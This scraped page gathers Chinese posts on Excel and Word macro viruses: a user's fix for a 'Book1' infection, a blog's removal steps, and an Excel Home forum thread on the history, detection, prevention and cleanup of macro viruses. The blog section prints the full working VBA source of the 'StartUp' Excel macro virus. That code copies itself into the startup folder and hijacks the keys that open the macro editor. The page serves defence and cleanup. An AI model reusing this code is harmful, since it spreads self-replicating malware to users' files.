EXCEL宏病毒（打开excel文件,会同时打开一个book1的空excel.关闭不断新建窗体&）--欢迎访问乌鲁木齐职业大学网站
&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&
当前位置：&&&&&&&&&&&&&&&&&&&&&&--&正文
EXCEL宏病毒（打开excel文件,会同时打开一个book1的空excel.关闭不断新建窗体&）
昨天同事excel,结果发了个现在我的Excel中了宏病毒. 现象如下: 打开任何excel, 都会同时打开一个book1的空excel. 一关闭不停新建窗体，现将处理方式分析给大家，
如果有更好的请共享下。此类病毒确实讨厌~~~~~
方法一（网上传言，但学识浅薄没看懂）：
這類似病毒的東西任何2000以上版本應該都適用包含2007沒看到甚麼危害性的程式程式會自動存檔 刪除就好下的自動定義 有AUTO_OPEN 與AUTO_CLOSEAUTO_OPEN 用在這檔案沒用到 暫時沒用 使用AUTO_CLOSE在關閉檔案時會啟動程式還好這檔沒使用4.0關閉ESC功能 只要按ESC中斷程式即可這程式可以已收集起來 但裡面的定義 可能要整理一下 刪除一些沒必要的
方法二（自己瞎整但解决了）：1、此类文件会在 C:\Program Files\Microsoft Office\Office12\xlstart\Book1. 创建Book1. 文件（如果没有“xlstart”文件夹，新建一个“xlstart”文件夹，在文件夹内新建个“Book1.xls“ 文件 ）；如果有则删除Book1. 文件，新建个“Book1.xls“ 文件。&&&&&&&&&&&&&&&& 2、 到 C:\Program Files\Microsoft Office\Office11\xlstart\ 删除：Book1. 文件.&& 在打开EXCLE文件，问题就解决了（我是这么解决的，如果有更好的解决方法请大家一起分享）。
上一篇文章：
下一篇文章：
相关链接：温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
LOFTER精选
&&&&&& ③ 在模块“StartUp”的上面点击右键，再点“移除StartUp(R)”；&&&&&&&& ④ 再在跳出的的对话框中点击“否”；&&&&&&& ⑤ 保存并退出Visual Basic编辑器；&&&&&& ⑥ 保存并退出excel文件。5. 预防&&&&&& ”宏“病毒实际上就是一段恶意的VBA代码，故最好的预防方式就是提高安全级别，且不要轻易打开文件中的”宏“。”宏“安全性的设置方法是：&&&&&& 依次点击 → 工具 → 宏 → 安全性(S)…… → 中
6. 附录：StartUp”宏“病毒代码：Sub auto_open()On Error Resume NextIf ThisWorkbook.Path Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWorkbook.NameActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name "StartUp" ThenApplication.ScreenUpdating = Falsen$ = ActiveSheet.NameWorkbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)Sheets(n$).SelectEnd IfEnd SubSub escape()On Error Resume NextApplication.OnSheetActivate = "StartUp.xls!back"Application.OnKey "%{F11}"Application.OnKey "%{F8}"Application.SendKeys "%{F11}"Application.SendKeys "%{F8}"For Each book In WorkbooksApplication.DisplayAlerts = FalseIf book "StartUp.xls" Then book.Sheets("StartUp").DeleteNextFor Each book In WorkbooksIf book.Name = "StartUp.xls" Thenbook.CloseEnd IfNextEnd SubSub back()On Error Resume NextApplication.OnKey "%{F8}", "StartUp.xls!escape"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnSheetActivate = "StartUp.xls!cop"Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"Workbooks.Open Application.StartupPath & "\StartUp.xls"End Sub
阅读(5272)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'StartUp“宏”病毒救了我',
blogAbstract:'&&&&& & 上个月底，采购部小姑娘的电脑中毒了，急得哇哇叫，一天打了几个电话让我上去帮忙。一查下来，原来是Excel中了名为StartUp的“宏”病毒，估计是被供应商发过来的东西感染的。回到楼下大概琢磨了一会儿，上去一试身手，搞定。小姑娘很是高兴：“啊呀，真是高手啊，你说该怎么感谢你呢？来，吃颗话梅吧！”&&&& & 无语中……&&&&&& 到了年底，财务部门自然是最忙的，财务经理、会计、出纳全都淹没在付款申请单据中。手头有几份PD们签字签得晚的工人工资付款申请，已经交到财务两天，总算登录、复核完了，却在打印贷记凭证这一关迟滞了下来，上楼一看，好家伙，申请单据真是堆积如山。赶紧问会计小姑',
blogTag:'startup,宏,病毒',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:6,
publishTime:6,
permalink:'blog/static/',
commentCount:4,
mainCommentCount:2,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'1',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}前两天从EXCEL HOME论坛里下载了一个帖子的附件（当然我认为该帖的发表人也不知道文件里有病毒），没想里面有宏病毒“StartUp.xls”在打开文件时提示，缺少“StartUp.xls”。因为论坛里有很多附件是包含宏的，为了使用时方便，因此我EXCEL中关于宏安全性设置的是“低”。没想到造成了大错，在此提醒各位一定要将EXCEL中“工具→宏→安全性→安全级”设置为中，打开文件时要确认该文件是否包含宏。
对于宏病毒的判断：当安全级选为中时，如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏，那么恭喜你已经中招了。此时一定要注意所有打开的文件（指WORD、EXCEL文件）不要存盘，因为宏病毒只有存盘后才会被感染，如果需要将文件进行保存，建议存储为TXT格式，然后从新进行排版。一定要将打开的文件作好备份再进行杀毒。
我从日中午发现机器里被感染病毒，先后使用了“eset smart security”“瑞星天空网站版”“360杀毒软件最新版”，但前两个软件均没有查出该病毒。只有360查了出来并将病毒清除。注意：在杀毒时不要选择“自动处理扫描出的病毒威胁”因为杀毒软件有可能会直接将文件删除，到时重要文件被删掉可是哭都来不及了，当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式，也可以使用XP自带的“写字板”（注意不是记事本）将word文件直接打开，并将内容保存下来，然后再交给杀毒软件处理。这样就能保证文件内容不会丢失了。
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
excel 宏病毒是怎么来的
随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及 商业性的ChinaNet和COMNet的发展, 电子邮件同样成为许多网络用户使用的工 具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击 的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱. 据透露, 一种新的致命病毒---Hare病毒定于近期”发作”. Hare病毒届时将显示 HDEuthanasia的信息, 然后企图重写计算机硬盘上的全部文件.英国《病毒公报》 编辑Ian Whalley指出, Hare极为复杂, 而且很难查出. 它是借Internet传播的,未激活 版本已在几个国家发现,其中包括美国.
另外一种新病毒属于被称为”宏病毒”的传染病毒家族, 宏病毒于一年前首次 被发现. 这种新病毒称为ExcelMacro. Laroux, 是首例感染Microsoft公司Excell电子 表格的病毒.Laroux的表现很像目前常见的Word. concept病毒,后者在Microsoft Word生成的文档中传播. Laroux可做为电子表格的附件进入电子邮件,或以其他 同电子表格相同的传送方式传播. 据美国全国计算机安全协会(NCSA)称, 这种病 毒相对来说没有什么危害,但可导致少数系统的”应用软件异常”.NCSA指出, Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛, 而且用户不常共用电子表格, 而文字处理器文档则经常共用.
去年，用户经受的宏病毒猛增了5倍，安全专家把这主要归结为一个因素—— 电子邮件的迅速增加。这条令人烦恼的新闻，是出自美国全国计算机安全协会 (NCSA)进行的一次新的调查。资助这项调查的反病毒软件销售商认为，这项调 查的新资料中显示了病毒对公司计算的巨大威胁，并且也显示了一次新的商业 机会。
NASC对300个机构进行民意测验的结果是：
据报告各种类型的病毒增加了3倍，且80％是宏病毒的变种，比较而言，一年 前只有49％是宏病毒。
在全部事故中，几乎有70％是由两种最普通的宏病毒，即Word.Concept和 Wazzu引起的，并且往往是由电子邮件的附件传输的。
去年尽管装有反病毒软件的电脑的数目从60％增加到73％，但病毒还是增加 了。
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
宏病毒的危害
目前发现的几种主要宏病毒有:Wazzu、Concept、13号病毒(又称&台湾1号&病 毒)。13号病毒运行在中文Word上,其发作时间为每月13号,用户打开文件时 出一道四则运算题,往往这道题必须经过本机的WordBasic运算才能做对,而 用计算器,或其它机器均有可能产生错误;如果答对,则进行宏病毒的问答,如& 我是宏病毒,如何预防我&,答案是&不要看我&。如果有一个地方答错,则创建20 个文档,并不断截取硬盘和内存空间,直至系统瘫痪。如果全部答对,系统才能 进入正常。
Wazzu、Concept主要运行于西文Word环境中。Wazzu病毒在正常的Word文 件中加入Wazzu字符,并将格式打乱,从而损坏用户的文件。Concept病毒也采 用同样的方式,在正常文件中加入其特征字符,从而影响用户的正常工作。 与感染普通EXE或COM文件的病毒相比,Word宏病毒具有隐蔽性强,传播迅 速和危害更加严重等特点,说它隐蔽性强是由于人们忽视了在传递一个文 档时也会有传播病毒的机会;说它传播迅速是因为办公数据的交流要比拷 贝EXE文件更加经常和频繁,如果说扼制盗版可以减少普通EXE或COM病 毒传播的话,那么这一招对Word病毒将束手无策;而说它危害更加严重则是 因为Microsoft Word几乎已经成为目前全世界办公文档的事实工业标准,其 影响是全球范围的,在中国也绝不例外。Word文件的交换是目前办公数据 交流和传送的最通常的方式这一,其涉及面比盗版软件的传播要大得多,传 播速度则更加有过之而无不及。据报道,70%-80%的中国计算机用户已经 不再单纯使用MS-DOS作为唯一的操作环境,看VCD和使用Word成为用户 使用Windows应用程序的榜首。无数的DOC文件从上级机关金字塔般地传 播到基层,基层又上报到上级机关,从各个单位的办公室到工作者的家庭,到 出版部门的计算机系统。于是,便存在这样一种可能,当成千上万的x86计算 机系统在传播和复制这些数据以及文档文件的同时,也在忠实地传播和复制 这些病毒。
宏病毒是针对微软公司的字处理软件Word编写的一种病毒。微软公司的字 处理软件是目前最为流行的编辑软件,并且跨越了多种系统平台,宏病毒充分 利用了这一点得到恣意传播。由于宏病毒利用了Word的文档机制进行传播, 它和以往的病毒防治方法不同,一般情况下,人们大多注意可执行文件(.com、 .exe)的病毒感染情况,而Word宏病毒寄生于Word的文档中,而且人们一般都要 对文档文件进行备份,因此病毒可以隐藏很长一段时期。目前,国内发现的该 种病毒主要在大公司和外企单位中传播。由于该病毒能跨越多种平台,并且 针对数据文档进行破坏,因此具有极大的危害性,该病毒在公司通过内联网相 互进行文档传送时,迅速漫延,往往不到一周的时间就能使公司的机器全部染 上病毒
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
宏病毒的预防
尽管宏病毒的破坏性较大，而且具有一定的隐蔽性，采用常规的文件性病 毒判定方法，不能判断宏病毒的存在，通过以下方法可简单地判断某文档 是否感染了宏病毒：
在自己使用的WORD中打开宏菜单，点中Normal模板，若发现有AutoOp en、AutoNew、AutoClose等自动宏以及FileSave、FileSaveAs、FileExit等文件 操作宏或一些怪名字的宏，如AAAZAO、PayLoad等，就极可能是病毒在作 祟了，因为大多数Normal模板中是不包含上述宏的。
如果打开文档，未经任何改动，就提示存盘，也可能是Word带病毒。
打开以DOC为后缀的文件在另存菜单中只能以模板方式存盘，也可能带 有Word宏病毒。
如何防止Internet网上病毒的传播，可从以下几个方面着手：
要有安全意识,对于从Internet网上下载的一些可执行文件,需要事先用杀毒 软件查毒,或在微行机上安装了病毒防御系统方可执行,所有从Internet上取来 的数据多应该严格禁止进入企业内部网,对从Internet下载的或电子邮件中所 附的电子文档(如Word的doc文档和Excel的XLS文档,如这些文档的来历不明, 或电子邮件的标题中含有类似”欢迎你浏览我”等欺骗性的语句,千万不要 盲目地用Word或Excel打开此类文档,因为有些文档中可能包含有宏病毒,标 题中的一些引诱性的语句只不过是病毒制造者向你投下的”诱饵”.
要选用Internet病毒防火墙系统,这类系统采用病毒隔离技术,对从Internet上 所下载的数据进行病毒检测,发现病毒会及时清除并报警.
如果没有采取上述措施,则应经常用杀毒软件对Internet的下载数据进行查 毒.如Word-VRV能够发现目前国际上流行的宏病毒,对一些新的宏病毒可以 进行扩充定义,
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
宏病毒的彻底清除
我们从以上宏病毒的特性可以看出，宏病毒主要是利用存在于模板之中的 自动宏(AutoOpen、AutoClose、AutoNew)以及Normal.dot公用模板来进行传 播的，因此清除和预防宏病毒的方法也应从这两方面入手：
对于已染病毒的文件首先应将Normal.dot中的自动宏清除(AutoOpen、Aut oClose、AutoNew)；然后将Normal.dot置成只读方式。
对于其它已染毒的文件均应将自动宏清除，这样就可以达到清除病毒的 目的。
平时使用时要加强预防。对来历不明的宏最好予以删除；如果发现后缀 为.DOC的文件变成模板时，则可怀疑其已染宏病毒，其主要表现是在Save As文档时，选择文件类型的框变为灰色。
在打开文件时，按住SHIFT键可以阻止自动宏的运行。例如，当您用含 有AutoNew宏的模板新建一个文档时，在“新建”对话框(“文件”菜单) 中单击“确定”按钮时按住SHIFT键，就可以阻止AutoNew宏的执行。您 要按住SHIFT键直到新文档显示在窗口中。在可以触发自动宏的宏中，您 可以用DisableAutoMacros阻止运行自动宏。
另外，还有一个有趣的现象，就是中英文Word中的宏病毒有时并不兼容， 在英文中宏病毒可能在中文Word中无法运行和传染。
用杀毒工具自动清除宏病毒是理想的解决办法,方法有两种:
方法1.用WordBasic语言以Word模板方式编制杀毒工具,在Word环境中杀毒。方法2.根据WordBFF格式,在Word环境外解剖病毒文档(模板),去掉病毒宏。
方法1因为在Word环境中杀毒,所以杀毒准确,兼容性好。而方法2由于各个 版本的WordBFF格式都不完全兼容,每次Word升级它也必须跟着升级,兼容 性不好。目前有些DOS杀毒软件不是采用WordBFF格式去解剖病毒文档(模 板),而是简单地把病毒文档(模板)中的某些特征串填为零,给用户一个假象杀 掉了病毒,而实际上病毒宏无法被去除,杀毒后的文件长度与带病毒时的长度 相等,这种做法有三个缺点:1.容易将原文档破坏。2.很容易漏杀病毒。3.要不 断地随着Word版本升级和病毒变化而更改程序。因为每个版本的WordBFF格 式不完全一样,所以病毒宏在不同版本的Word中被压缩的格式和存放的位置 都不同;另外若文档正文中包含病毒串描述,就会被错杀。
Word-VRV是用WordBasic语言以Word模板方式编制的杀毒工具,它在Word环 境中杀毒。Word-VRV由WORDVRV.DOT(用于中文版Word中)、EWORD-VR V.DOT(用于英文版Word中)、README.EXE三个文件组成。Word-VRV是个 可自升级的Word杀毒器,具有下列特点:
可在Word有毒环境下自动检测并清除Word模板中的病毒;
自动检测各有效驱动器及路径下的文档(模板);
有只检测功能;
发现病毒则提示和报警,并产生列表;
可以备份带毒文档(模板);
允许使用者自己定义结构,清除新的宏病毒。利用Word-VRV的可扩充性,使 用者可杀除所有新的宏病
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
宏病毒的判断方法
　　虽然不是所有包含宏的文档都包含了宏病毒，但当有下列情况之一时，您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒： 　　1、在打开“宏病毒防护功能”的情况下，当您打开一个您自己写的文档时，系统会会弹出相应的警告框。而您清楚您并没有在其中使用宏或并不知道宏到底怎么用，那&&宏病毒
么您可以完全肯定您的文档已经感染了宏病毒。 　　2、同样是在打开“宏病毒防护功能”的情况下，您的OFFICE文档中一系列的文件都在打开时给出宏警告。由于在一般情况下我们很少使用到宏，所以当您看到成串的文档有宏警告时，可以肯定这些文档中有宏病毒。 　　3、如果软件中关于宏病毒防护选项启用后，不能在下次开机时依然保存。WORD97中提供了对宏病毒的防护功能，它可以在“工具/选项/常规”中进行设定。但有些宏病毒为了对付OFFICE97中提供的宏警告功能，它在感染系统（这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能）后，会在您每次退出 OFFICE时自动屏蔽掉宏病毒防护选项。因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效，则您的系统一定已经感染了宏病毒。也就是说一系列WORD模板、特别是normal.dot 已经被感染。 　　鉴于绝大多数人都不需要或着不会使用“宏”这个功能，我们可以得出一个相当重要的结论：如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
宏病毒的防治和清除
　　1、首选方法：用最新版的反病毒软件清除宏病毒。使用反病毒软件是一种高效、安全和方便的清除方法，也是一般计算机用户的首选方法。但是宏病毒并不象某些厂商或麻痹大意的人那样认为的有所谓“广谱”的查杀软件，这方面的突出例子就是ETHAN宏病毒。 　　ETHAN宏病毒相当隐蔽，比如您使用KV300 Z+、RAV V9.0(11)、 KILL 85.03等反病毒软件（应该算比较新的版本了）都无法查出它。此外这个宏病毒能够悄悄取消WORD中宏病毒防护选项，并且某些情况下会把被感染的文档置为只读属性，从而更好地保存了自己。&&宏病毒
因此，对付宏病毒应该和对付其它种类的病毒一样，也要尽量使用最新版的查杀病毒软件。无论你使用的是何种反病毒软件，及时升级是非常重要的。比如虽然KV300 Z+版不能查杀ETHAN宏病毒，但最新推出的KV300 Z++已经可以查杀它。 　　2、应急处理方法：用写字板或WORD 6.0文档作为清除宏病毒的桥梁。如果您的WORD系统没有感染宏病毒，但需要打开某个外来的、已查出感染有宏病毒的文档，而手头现有的反病毒软件又无法查杀它们，那么您可以试验用下面的方法来查杀文档中的宏病毒：打开这个包含了宏病毒的文档（当然是启用WORD中的“宏病毒防护”功能并在宏警告出现时选择“取消宏”），然后在“文件”菜单中选择“另存为”，将此文档改存成写字板（RTF）格式或WORD6.0格式。 　　在上述方法中，存成写字板格式是利用RTF文档格式没有宏，存成 WORD 6.0格式则是利用了WORD97文档在转换成WORD6.0格式时会失去宏的特点。写字板所用的rtf格式适用于文档中的内容限于文字和图片的情况下，如果文档内容中除了文字、图片外还有图形或表格，那么按 WORD6.0格式保存一般不会失去这些内容。 　　存盘后应该检查一下文档的完整性，如果文档内容没有任何丢失，并且在重新打开此文档时不再出现宏警告则大功告成。
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
宏病毒的防御
Microsoft公司的Word字处理软件因其功能强大，使用方便等诸多优点受到广大使用者的青睐，版本从2．0、5．0、6．0直7．0（Word95）、8．0（Word97），不断升级。Word的推广使用，确实为文本处理工作带来了极大的便利，但随之而来的宏病毒也平添了不少烦脑。宏病毒困扰着用Word处理的文本，轻则文本不能正常存储，重则变成乱码，甚至磁盘被格式化，使许多普通用户谈“宏”变色。实际上，在了解了Word宏病毒的编制、发作过程之后，即使是普通的电脑用户，不借助任何杀毒软件，也可以较好地对其进行防治。 　　Word宏病毒是一种用专门的Basic语言即WordBasic编写的程序。与其它计算机病毒一样，它能对用户系统中的可执行文件和数据、文本类文件造成破坏。Word中提供由用户编制宏这一功能是为了让用户能够用简单的程序，简化一些经常重复性的操作，与DOS中的批处理文件类似。Word宏的编制技术，与其它复杂的编程技术相比，要求很低很容易编制，这就为心怀恶意的计算机用户提供了一种简单高效的制造病毒手段。但也正因其编制简单，使宏病毒的防治远较那些用复杂的编程语言编制的病毒容易得多。 　　下面就谈在日常用Word处理文本时，如何预防和消除宏病毒。防止“病从口入”是对付所有病毒的指导思想，同样对付宏病毒的重点也应该放在对其预防上。Word宏病毒的触发条件是在启动或调用Word文档时，自动触发执行，因此，只要不打开被感染的文本，宏病毒是不会传播的。如果打开了带毒的文本，其它没打开的文本不会被感染；即使是打开了其它文本，只要不存盘，也不会感染到硬盘中的文本。Word本身不带病毒，即初次进入Word环境时没有病毒，一旦在其中打开带宏病毒的文件，病毒就会留在Word环境中，如果这时打开其它文件，这些文件就会被感染；更严重的是，关闭Word时的环境就带上了宏病毒，而这时处理的所有文档都将感染上宏病毒。 　　宏病毒入侵有两条路径，一是E-mail，二是软盘，其共同特点是只能通过word格式（文件后缀为dos或rtf）传播。只要不用word格式存盘，而用txt格式，宏病毒就无从存活了。因此，为了防止宏病毒通过软盘流传，在交换软盘时，可要求对方用TXT格式传交文件，或者先用Window提供的书写器（对window3．X而言），或写字板（对Window而言）打开外来的word文档，将其先转换成书器或写字板格式的文件并不保存后，再用word调用。因为书写器或写字板是不调用也不记录和保存任何Word宏的，文档经此转换，所有附带其上的宏都将丢失，当然，这样做将使该Word文档中所有的排版格式一并丢失。 　　如果必须保留原有的文档排版格式，可以有以下几种方式预防或判断是否有宏病毒。 　　1、为了防止病毒的侵入，用户在新安装了Word后，可打开一个新模板，将Word的工作环境按你的使用习惯进行设置，并将你需要使用的宏一次编制好，做完后，保存为Normal.dot。新的Normal.dot按你的需要设置并绝对没有宏病毒，将这份干净的Normal.dot备份。在遇到有宏病毒或怀疑感染了宏病毒的时候，用备份的Normal.dot覆盖当前的Normal.dot模块。另外，为了防止病毒蔓延，可将你新设置的Normal.dot文件的属性设置成“只读”，以后当退出Word环境时，如果出现自动修改“Normal.dot”的对话框，而你并没有录制新的宏，说明有宏病毒，此时选择“否”，以保持Word环境的干净。 　　2、在调用Word文档时先禁止所有以Auto开头的宏的执行（因为一般宏病毒只能用“Auto×××”命名）。这样能保证用户在安全启动Word文档后，再时行必要的病毒检查。对于使用Word97版本的用户，Word97已经提供此项功能，将其激活或开即可。方法是点击“工具|选项”，然后单击“常规”，选择“宏病毒防护”，使其有效，这样，当前打开的Word文档所使用模板就有了防止“自动宏”（以Auto开头命名）执行的功能。当以后使用这个模板的文档时，如果打开的文档带有“自动宏”，并询问用户是否执行这些宏，这进选择“取消宏”进入Word并打开文档，再进一步对文档进行“宏”检查。对使用Word97以前版本的用户，需要自行编制一个名为AutoExec的。将AutoExec宏保存在一个另外命名的Word模板中，比如AE.dot，当要使用外来的Word文档时，将AE.dot模板该名为Normal.dot（备份原来的Normal.dot），宏AutoExec执行时，将关闭其它所有动执行的Word宏。如果不使用外来文档，可以将原来备份的Normal.dot模板再该名拷贝回来。 　　如果确信你的文件和系统已不幸感染了宏病毒。毫无疑问，应该停下手边的其它工作，争取彻底清除宏病毒。一般可采取以下两个步骤： 　　1、进入“工具|宏”，查看模板Normal.dot，若发现有Filesave、Filesaveas等文件操作宏或类似AAAZAO、AAAZFS怪名字的宏，说明系统确实感染了宏病毒，删除这些来历不明的宏。对以Auto×××命名的，若不是用户自己命名的自动宏，则说明文明感染了宏病毒，删除它们。若是用户自己创建的自动宏，可以打开它，看是否与原来创建时的内容一样，如果存在被改变处，说明你编制的自动宏已经宏病毒修改这时应该将自动宏修改为原来编制的内容。在最糟的情况下，如果分不清那些是宏病毒，为安全起见，可删除所有来路不明的宏，甚至是用户自己创建的宏。因为即便删错了，也不会对Word文档内容产生任何影响，仅仅是少了“宏功能”。如果需要，还可以重新编制。 　　2、即使在“工具|宏”删除了所有的病毒宏，并不意味着你可以高枕无忧了。因为病毒原体还在文本中，只不过暂时不活动了，也许还会死灰复燃。为了彻底消除宏病毒，再时入“文件|新建”，选择“模板”，正常情况下，可以在“文件模板”处见到“Normal.dot”，如果没有，说明文档模板文件Normal.dot已被病毒修改了。这时用你手边原来备份的Normal.dot覆盖当前的Normal.dot；或你没有备份，则删掉然毒Normal.dot，重新进入Word，在“模板”里，充置默认字体等选项后退出Word，系统就会自动创建一个干净的Normal.dot。再进入Word，再打开原来的文本，并新建另一个空文档，这时新建文档是干净的；将原文件的全部内容拷贝到新文件中，关闭感染宏病毒的文本，然后再将新文本保存为原文件名存储。这样，宏病毒就感染彻底清除了，原文件也恢复了原样，可以放心大胆地编辑、修改、存储了。 　　虽然上述方法对大部分宏病毒可彻底清除，但是“道高一尺，魔高一丈”，有些智能点数比较高的宏病毒，会事先防范，让宏编辑功能失效，进入“工具|宏”的时候，看不到病毒的名字，因此，也就无法删除它们。对付这“狡猾”的宏病毒，可选用杀宏病毒的专门软件如KV300、VAV、瑞星等进行杀除。并注意检查出文件可能感染病毒后，首先对文件备份，然后再执行清除命令，以免意情况下杀掉病毒的同时改变原文件的内容。 　　以上是关于宏病毒的预防和杀除。总之，首先要保证文档环境无病毒，即Normal.dot文档模板是干净的；其次是要预防在Word里打开的文本携有病毒；最扣，发现了宏病毒后，要采取行之有效的措施，保证文档环境、文档本身恢复到无病毒状态。
在线时间135 小时经验62 威望0 性别男最后登录注册时间阅读权限20UID1278772积分62帖子精华0分享0
EH初级, 积分 62, 距离下一级还需 288 积分
积分排行3000+帖子精华0微积分0
宏病毒后遗症的清除
以“台湾一号”为代表的专门感染WORD文档的新型病毒——宏病毒侵入计算机。许多人的染毒文档在杀毒之后(或手工，或杀毒软件)，依然是以一种模板形式存盘。这样就导致“另存为”命令失效，即此文件已不能转换为别的文件格式(如TXT)。其实这就是宏病毒留下的“后遗症”，应该把它清除干净。下面就谈谈如何清除这种“后遗症”。 　　DOC文件被宏病毒感染后，它的属性必然会被改为模板，而不是文档(尽管形式上其扩展名仍是DOC)。此时可按下述步骤进行处理： 　　1，将该文件打开。2，选择全部内容，复制到剪贴板。3，关闭此文件。4，新建一个DOC文件(此前应保证Normal模板干净)。5，粘贴剪贴板上的内容。6，另存为原文件名(将原来模板属性的文件覆盖)。 　　现在，该文档的“另存为”命令可以正常使用了，宏病毒的“后遗症”清除完毕。照此法处理所有曾经染毒的 　　文档。最后想说一句，清除宏病毒时，若染毒文档太多，手工方法将非常繁琐，杀毒软件又不十分完善(存在杀不干净或误杀的问题)，所以最好采用杀毒软件与手工清除相结合的方式。
在线时间1516 小时经验2853 威望0 性别男最后登录注册时间阅读权限70UID188791积分2853帖子精华0分享0
EH铁杆, 积分 2853, 距离下一级还需 347 积分
积分排行335帖子精华0微积分0
很好！谢谢！
祝新年快乐！
- 注意：自起，未完成邮箱认证的会员将无法发帖！如何完成邮箱认证？请点击下方“查看”。
关注我们，与您相约微信公众平台！
Copyright 1999 - 2017 Excel Home. All Rights Reserved.本论坛言论纯属发表者个人意见，任何违反国家相关法律的言论，本站将协助国家相关部门追究发言者责任！
Powered by
本站特聘法律顾问：徐怀玉律师 李志群律师 &&